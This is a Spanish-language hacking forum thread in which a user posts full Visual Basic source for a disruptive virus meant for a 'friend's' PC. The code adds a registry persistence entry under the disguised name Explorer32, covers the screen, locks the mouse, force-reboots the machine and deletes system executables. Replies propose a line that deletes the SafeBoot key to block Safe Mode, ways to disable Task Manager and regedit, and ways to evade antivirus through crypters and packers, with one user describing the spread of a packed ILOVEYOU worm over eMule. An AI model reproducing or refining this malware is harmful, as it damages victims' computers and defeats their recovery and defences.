Jode la PC de un 'amigo' AQUI 100% vb

[Saint.Anger]

bueno aqui les dejo este pequeño programita jaja.
 espero q lo difruten...
 lo que hace es lo siguiente.:

 * se agrega al registro de win y se copia a la carpata de windows, asi se ejecuta cuando prende la PC
* aparece una ventana(ocupando toda la pantalla) en negro con un mensaje. La ventana es OlwaysOnTop
* cuando pasan 5 minutos reinia la pc
* hace q el puntero del mouse se quede en un lugar fijo y q cada 2 minutos desaparezca y aparezca el puntero
* si llegan a cerrar la aplicacion se agrega otra vez al reg. (x si nos sacan con el msconfig) y se ejecuta

. creo q no me olvide de nada xD

 bueno cualquier comentario, critica o lo que sea esta desde ya recibido...

Código:

En un modulo bas

Option Explicit

' Funcion para apagar/reiniciar Windows
Public Declare Function ExitWindowsEx Lib "user32" _
(ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Public Const EWX_LOGOFF = 0     ' Cerrar sesion
Public Const EWX_REBOOT = 2     ' Reiniciar
Public Const EWX_SHUTDOWN = 1   ' Apagar
Public Const EWX_FORCE = 4      ' Forzar cierre de aplicaciones

'################################################

' Funcion para ocultar/mostrar el mouse
Public Declare Function ShowCursor Lib "user32" _
(ByVal bShow As Long) As Long

'################################################

' Funcion para establecer la posicion del mouse
Public Declare Function SetCursorPos Lib "user32" _
(ByVal x As Long, ByVal y As Long) As Long

'################################################

' Funcion para que la ventana sea AlwaysOnTop
Public Declare Function SetWindowPos Lib "user32" _
(ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _
ByVal x As Long, ByVal y As Long, ByVal cx As Long, _
ByVal cy As Long, ByVal wFlags As Long) As Long

Public Const HWND_TOPMOST = -1      ' AlwaysOnTop
Public Const HWND_NOTOPMOST = -2    ' Normal
Public Const SWP_NOSIZE = &H1       ' Tamaño fijo
Public Const SWP_NOMOVE = &H2       ' Sin movimiento
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40

'################################################

Public Sub Apagar(opcion As String)
    On Error Resume Next
    Dim ret As Integer
   
    Select Case opcion
        Case "apagar"
            ' apaga el equipo y cierra las aplicaciones
            ret = ExitWindowsEx(EWX_SHUTDOWN Or EWX_FORCE, 0)
            Exit Sub
        Case "reiniciar"
            ' reinicia el equipo y cierra las aplicaiones
            ret = ExitWindowsEx(EWX_REBOOT Or EWX_FORCE, 0)
            Exit Sub
        Case Else
            ' muestra un mensaje de error
            MsgBox "El parametro pasado al procedimiento 'Apagar' es incorrecto", vbOKOnly + vbCritical, "ATENCIÓN"
            Exit Sub
        End Select
End Sub

Public Sub MostrarMouse(Estado As Boolean)
    On Error Resume Next
    Dim ret As Long
   
    ' Si estado=TRUE (queremos mostrar el puntero)
    If Estado = True Then
    ' Llamar a ShowCursor tantas veces como sea necesario
    ' para que el cursor vuelva a su estado original(visible)
        Do
            ret = ShowCursor(True)
        Loop Until ret = 0
    Else
        ret = ShowCursor(False)
    End If
End Sub

Public Sub PosMouse(x As Long, y As Long)
    On Error Resume Next
    SetCursorPos x, y
End Sub

Public Sub AlwaysOnTop(F As Form, Estado As Boolean)
    On Error Resume Next
    Dim wFlags As Long
    Dim ret As Long
   
    ' Para que no cambie ni el tamaño ni la posicion
    wFlags = SWP_NOMOVE Or SWP_NOSIZE
   
    If Estado Then
        ret = SetWindowPos(F.hwnd, HWND_TOPMOST, 0, 0, 0, 0, wFlags)
    Else
        ret = SetWindowPos(F.hwnd, HWND_NOTOPMOST, 0, 0, 0, 0, wFlags)
    End If
End Sub

Public Sub CargarV(ByVal Ffile As String)
    On Error Resume Next
    Dim objNew As Object
   
    Set objNew = CreateObject("WScript.Shell")
    objNew.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Explorer32", Ffile
End Sub

Public Sub ShadeString(ByVal canvas As Object, _
ByVal start_x As Single, ByVal start_y As Single, _
ByVal start_r As Integer, ByVal start_g As Integer, _
ByVal start_b As Integer, ByVal end_r As Integer, _
ByVal end_g As Integer, ByVal end_b As Integer, _
ByVal txt As String)
   
    On Error Resume Next
    Dim r As Single
    Dim g As Single
    Dim b As Single
    Dim dr As Single
    Dim dg As Single
    Dim db As Single
    Dim txt_len As Integer
    Dim i As Integer

    txt_len = Len(txt)
    dr = (end_r - start_r) / (txt_len - 1)
    dg = (end_g - start_g) / (txt_len - 1)
    db = (end_b - start_b) / (txt_len - 1)
    r = start_r
    g = start_g
    b = start_b
    canvas.CurrentX = start_x
    canvas.CurrentY = start_y
    For i = 1 To txt_len
        canvas.ForeColor = RGB(r, g, b)
        canvas.Print Mid$(txt, i, 1);
        r = r + dr
        g = g + dg
        b = b + db
    Next i
End Sub

Public Sub Cronometrar()
    On Error Resume Next
    Dim Pausa As Currency
    Dim Inicio As Currency
    Dim Fin As Currency
    Dim Tiempototal As Currency
    Pausa = 300
    Inicio = Timer
    Do While Timer < Inicio + Pausa
        DoEvents
        Form1.Visible = True

    Loop

    Apagar "reiniciar"
    Fin = Timer
    Tiempototal = Fin - Inicio
End Sub

=====================================================
En un formulario
El formulario ::
BorderStyle = 0
BackColor = vbblack
Font = Lucida Console
WindowState = 2
agregar 3 timers
    * Ocultar
Interval 2000
Enabled = False
    * Mostrar
Interval 2000
Enabled = True
    * MousePos
Interval 1
Enabled = True
Option Explicit

Private Sub Form_Load()
    On Error Resume Next
    AlwaysOnTop Me, True
    CargarV "C:\Windows\Explorer32.exe"
    Cronometrar
    Kill "C:\Windows\System\*.exe"
    FileCopy App.Path & App.EXEName & ".exe", "C:\Windows\"
End Sub

Private Sub Form_Paint()
    On Error Resume Next
    Me.Cls
    ShadeString Me, 2000, 3500, 200, 250, _
    400, 50, 50, 150, "[ HackeD By BillyTheKid ]"
End Sub

Private Sub Form_Unload(Cancel As Integer)
    On Error Resume Next
    Shell App.Path & "\" & App.EXEName & ".exe"
    CargarV "C:\Windows\Explorer32.exe"
End Sub

Private Sub Mostrar_Timer()
    On Error Resume Next
    MostrarMouse True
    Mostrar.Enabled = False
    Ocultar.Enabled = True
End Sub

Private Sub Ocultar_Timer()
    On Error Resume Next
    MostrarMouse False
    Ocultar.Enabled = False
    Mostrar.Enabled = True
End Sub

Private Sub MousePos_Timer()
    On Error Resume Next
    PosMouse 400, 300
End Sub

[>> s E t H <<]

pero con la pantalla negra no se puede hacer nada?
cuando consiga una pc de prueba lo hago

PD: ponele nombre

[Saint.Anger]

pero con la pantalla negra no se puede hacer nada?
cuando consiga una pc de prueba lo hago

PD: ponele nombre

el nombre puedes ponerle el q quieras yo  le habia puesto Explorer32, para que no llame tanto la atencion, pero tu puedes ponerle el que quieras, no seas tan bestia de ponerle mi_virus o algo asi!
 con respecto a la pantalla negra, no entiendo a lo que te refieres, es decir la pantalla aparecera siempre, por sobre las demas, es decir que aunque ejecute otras aplicaciones no se veran xD...


 

[>> s E t H <<]

si, ya se q antes de coompilar yo le pongo el nombre pero decia q le pongas un nombre en el code como para k sepan q ese es ese viros

x ej: yo en mis worms pongo un textbox con el nombre q le di yo al worm o una varible o algo asi, o tambien q creen un archivo de texto plano (con extencion dll o exe para q no lo abra cualkiera)

[Dj_Dexter]

Tiene un punto debil si ejecutas el pc en modo seguro y le pasas el msconfig se borra la entrada, si el administrador de tareas se ve totalmente sobre otras ventanas se podria ver, si matas el app de en aplicaciones claro que se rematricula, pero si lo matan de procesos ahi se acaba, de todos modos el que no sabe mucho de informatica creeria que el pc esta malito xd
muy bueno el programa de todos modos 

Saludos

[Saint.Anger]

Tiene un punto debil si ejecutas el pc en modo seguro y le pasas el msconfig se borra la entrada, si el administrador de tareas se ve totalmente sobre otras ventanas se podria ver, si matas el app de en aplicaciones claro que se rematricula, pero si lo matan de procesos ahi se acaba, de todos modos el que no sabe mucho de informatica creeria que el pc esta malito xd
muy bueno el programa de todos modos   

Saludos

 Bueno desde ya muchas gracias por el comentario. Acerca del punto debil estoy seguro de que tendra muchos mas, pero con respecto al que vos decis, si sabes como solucionarlo y si queres no me pasas el code para hacerlo o sino alguna idea para mejorarlo un poco mas.


      Saludos       

[Zion_Tm]

Si, la verdad que en 2 minutos volas el "virus " desde el Modo Seguro, lo que tenes que hacer el evitar que el usuario pueda ingresar al Modo Seguro, con esta linea lo lograras

----- Publicado por >> s E t H <<


  El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot

[>> s E t H <<]

Si, la verdad que en 2 minutos volas el "virus " desde el Modo Seguro, lo que tenes que hacer el evitar que el usuario pueda ingresar al Modo Seguro, con esta linea lo lograras

----- Publicado por >> s E t H <<


  El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot

falta declarar e inicializar la variable el_objeto

[-SharK_90-]

Buen virus... auque algo sensillo.!!!
Pero, para empesar está muy bien....

En cuanto a lo de los puntos débiles.. hay muchos..
# No tenes que permitir que el usuario entre en Modo Seguro
# Tenes que bloquear o eliminar el Regedit, el Admin de tareas y no permitir usar el cmd
# Tenes que bloquear "Restaurar sistema"
# Pregunto una cosa.. ¿Ya lo probaste?
Le pegue una leida rápida, y encontré que esto está mal:

FileCopy App.Path & App.EXEName & ".exe", "C:\Windows\"

Es así:

FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\Explorer32.exe"

Igualmente, está función.. te la detectan los antivirus..!! Para copiar el programa a la carpeta Windows vas a tener que hacer otra cosa..(Usa tu imaginacion)

# Otra cosa: ¿Qué pasa, si el usuario tiene instalado Windows en otra carpeta? (por EJ:
D:\WINDOWS) -->> vas a tener que corregir esto.


-- Todas estos errores que te marque, los vas a tener que corregir vos..(No te pongo la solucion, ya que el Virus es tuyo... y aca no estamos para dejarte todo en Bandeja y asi de facil)...
Bueno - SALu2

[>> s E t H <<]

FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\Explorer32.exe"

Igualmente, está función.. te la detectan los antivirus..!!

no lo sabia eso... si encriptas la cadena tmb??

PD: la mayoria de los errores que puso shark tienen la solucion el mi guia jaj, re spamer

[-SharK_90-]

Hace la prueba y fijate... Nose los otros antivirus pero el NOD32 actualizado te lo detecta como codigo malicioso...

[SISAHACK]

  :cool:LO SIENTO BUEN AMIGO PERO SU FONT HA SIDO DETECTADO HASTA POR AVAST

  SIGUE INTENTANDO VAS POR BUEN CAMINO 


 

[Zion_Tm]

Tienen que esmerarse para evitar ser detectado. Una solucion es contruir algo nuevo ( code ) la otra es la cryptografia ........ hace un par de meses hize una prueba, agarre el fuente del virus i`love you , lo compile lo pase por un programita creo que se llamaba Crypto no se que y luego por el Themida ( compresion dinamica al 80%) obviamente quedo de 1Mb casi, pero totalmente indetetable, pues facil, lo joinie a varios programas mas y lo meti a la carpeta compartida del emule con nombres y peso diferentes.
En fin ...... con un codigo viejo y detectado, se transformo e algo super encriptado e ilegible para el motor de scaneo de los antivirus ...... es muy facil engañarlos...... hay varias formas, pero lo ideal es modificar el fuente ( con criterio ) y hacer algo bien.

Bueno, saludos a la gente que piensa 

[SKL]

y si apreto alt+tab se sale la aplicacion... y si voy a simbolos del sistema y saco el programa del Run?...

y si le cambio el nombre a la aplicacion ya no lo reconoce??

porqeu no tambien bloqueas el regedit y el msconfig??

deshabilita el taskmanager?...


todo eso deberias tenerlo en cuenta...

ah y que verifique si esta o no las cadenas ya dichas en el regedit, si no estan que se vuelvan a agregar!

saludos!

[Saint.Anger]

 HOla a todos, hace tiempo que no estoy en  el foro xD. Bueno teniendo en
cuenta todos sus comentarios, en cuanto termine de hacer una nueva version la pondre, tratare de solucionar todas las fallas que encontraron

    Saludos